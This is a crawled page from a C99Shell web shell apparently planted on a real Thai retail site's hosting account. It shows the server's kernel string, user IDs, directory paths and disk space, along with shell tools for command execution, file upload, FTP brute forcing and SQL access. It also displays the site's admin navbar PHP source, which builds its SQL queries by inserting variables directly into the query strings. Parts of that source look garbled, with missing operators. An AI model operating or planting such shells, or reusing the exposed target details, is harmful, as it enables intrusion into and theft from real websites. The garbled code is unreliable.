!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/krupimhomecenter.com/office/   drwxr-xr-x
Free 237.92 GB of 981.82 GB (24.23%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index_Navbar.php (2.1 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if(!isset($_SESSION['login_admin_id']) || $_SESSION['login_admin_id']==""){
    echo
"<script> window.location='index_Login.php'; </script>";
}
?>
<nav class="navbar navbar-default uppercase navbar-fixed-top">
    <div class="container-fluid">
        <div class="navbar-header">
            <a class="navbar-brand " href="index.php" style="color: black;"> <b> <? echo $fixed[fixed_website]; ?> </b> | admin </a>
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar">
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span> 
            </button>
        </div>
        <div class="collapse navbar-collapse" id="myNavbar">
            <ul class="nav navbar-nav" style="padding: 10px;">
                <div class="visible-xs visible-sm">
                    <? include 'index_menu_all.php'?>
                </div>
            </ul>
            <ul class="nav navbar-nav navbar-right">
                <li>
                    <a style="color: black;" href="../" target="_blank">
                        <?
                        $fixed_select_status_SL 
" SELECT fixed_status_id FROM fixed";
                        
$fixed_select_status_QR mysqli_query($con,$fixed_select_status_SL);
                        
$fixed_select_status  mysqli_fetch_array($fixed_select_status_QR);

                        
$fixed_status_nav_SL " SELECT * FROM fixed_status WHERE fixed_status_id = '$fixed_select_status[fixed_status_id]'";
                        
$fixed_status_nav_QR mysqli_query($con,$fixed_status_nav_SL);
                        
$fixed_status_nav   mysqli_fetch_array($fixed_status_nav_QR);
                        echo 
" สถานะเว็บไซต์ :   ".$fixed_status_nav[fixed_status_name];

                        
?> 
                    </a>
                </li>
                <li>
                    <a style="color: black;" href="../" target="_blank">
                        <span class="glyphicon glyphicon-home"></span> เข้าสู่เว็บไซต์หลัก 
                    </a>
                </li>
                <li>
                    <a style="color: black;">
                        <span class="glyphicon glyphicon-user"></span> ชื่อเข้าใช้ :  <? echo $login_admin[admin_user]; ?> 
                    </a>
                </li>
                <li>
                    <a style="color: black;" href="index_Logout.php">
                        <span class="glyphicon glyphicon-log-in"></span> ออกจากระบบ
                    </a>
                </li>
            </ul>
        </div>
    </div>
</nav>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0991 ]--